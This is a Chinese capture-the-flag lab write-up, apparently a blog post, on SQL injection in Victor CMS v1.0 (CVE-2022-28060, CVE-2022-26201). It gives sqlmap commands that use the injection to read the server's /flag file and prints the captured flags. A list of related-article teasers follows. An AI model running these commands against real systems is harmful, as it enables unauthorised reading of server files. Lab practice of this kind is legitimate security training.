[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag
CVE-2022-28060
访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来
python3 sqlmap.py -r 2.txt --file-read "/flag" --dbms Mysql
时间3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag
动下小手来个赞吧~~~
flag{bb728a3c-5fdd-4818-94c3-d2fdc7984561}
CVE-2022-26201
和上面同类型,点击首页上面banner的admin,未授权直接进入,找到如图的注入点
抓包,保存为3.txt,sqlmap跑起来,跟上面一样了
python3 sqlmap.py -r 3.txt --file-read "/flag" --dbms Mysql
时间也是3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag
动下小手来个赞吧~~~
flag{30dc0399-c6e1-4d81-82a1-0d35507a50eb}
总结:sql注入类ctf,直接根据--file-read "/flag" --dbms Mysql可以从数据库把flag down下来。
留个关注哦~~~
[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag相关推荐
- 春秋云镜wp day1
春秋云镜wp day1 (qq.com) 建议关注公众号 websec.space,以后文章来csdn备份一份 今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷, ...
- 2022最新爱奇艺签到助手V1.0网站PHP源码
正文: 2022最新爱奇艺签到助手V1.0网站PHP源码,支持扫码登录. 走的官方接口,程序开源不加密,安装教程: PHP环境,上传即可,PHP设置7.2就行 程序: wwwu.lanzouw.com ...
- i春秋2020新春公益赛 GYCTF有关SQL注入题复现
0x00 前言 最近这段时间参加过一些CTF在线竞赛,做过一些Web题,发现SQL注入漏洞出现的频率可真高!不过在做题中也get到了一些Web新知识,现在通过题目复现的方式总结一下. 0x01 bla ...
- 春秋云镜 CVE-2022-24223
春秋云镜 CVE-2022-24223 AtomCMS SQL注入漏洞 靶标介绍 Elite Graphix Elite Cms是印度Elite Graphix公司的一个用 Php 语言编写的 Web ...
- [春秋云镜]CVE-2020-19960,CVE-2020-19961
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 zz cms 2019 存在sql注入漏 ...
- 春秋云镜 CVE-2022-30887 多语言药房管理系统 (MPMS) [超详细新手教程]
文章目录 一.题目描述 二.简单分析 三.总结 提示:以下是本篇文章正文内容,下面案例可供参考 一.题目描述 多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的 ...
- [春秋云镜]CVE-2022-2073
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Grav CMS 可以通过 Twig 来 ...
- 春秋云镜 CVE-2022-24263
春秋云镜 CVE-2022-24263 Hospital Management System sqli 靶标介绍 HospitalManagementSystem是使用Mysql数据库的医院信息管理系 ...
- php wp foo,【翻译】WordPress WPDB SQL注入攻击(技术文档)
WordPress 4.8.3中修复了一个重要的SQL注入漏洞.漏洞是今年9月20日由Hacker-One报告的.本文主要讲了漏洞的技术细节和解决方法. 升级到最新版本 网站管理员应该升级WordPr ...
最新文章
- 求积问题[体会Python至简之道]
- dbinfo.properties mysql_java 8.0Mysql 助手类
- ASP.NET Core 进程外(out-of-process)托管(7)《从零开始学ASP.NET CORE MVC》
- m.2接口和nvme区别_NVMe/SATA SSD有啥不一样?萌新怎么选
- 计算机操作系统(5):操作系统的结构设计
- 解决:Gitlab上出现“You won‘t be able to pull or push project code via SSH until you add an SSH key to you
- python Raw I/O
- 肝完Alibaba这份面试通关宝典,我成功拿下今年第15个Offer
- c语言的开方程序,详细解析C语言中的开方实现
- 社交网络模型及属性介绍
- 黑客攻防实战入门(第三版)
- 三对角矩阵(特殊矩阵)
- 控制策略 | PI控制器积分分离的仿真分析
- t-SNE算法解析与简单代码实现
- 秀米图文编辑对接UEditor富文本编辑器样式丢失
- Knowledge Distillation
- 金沙滩51单片机LED 闪烁程序
- IDEA 默认浏览器修改设置
- antd select.option选项加入额外属性
- python容器结构 —— list - 列表篇 看这一篇就够了!
热门文章
- 在Visual Studio中使用GitHub扩展插件【1】——安装插件新建仓库
- Android WebRTC 音视频开发总结(一)
- my SQL 命令大全
- jdk 中常用的 xml 数据解析
- computer-02 显卡
- Ubuntu20.04密码忘记了怎么办?
- 西门子PLC S7-200cn和S7-200 smart 。 设备锁机程序
- 【算法练习】搜索/剪枝 百炼 poj4124:海贼王之伟大航路
- React Native中TouchableHighlight和TouchableOpacity无法获取焦点问题的解决
- 贩妖记 第三百七十二章,错误线路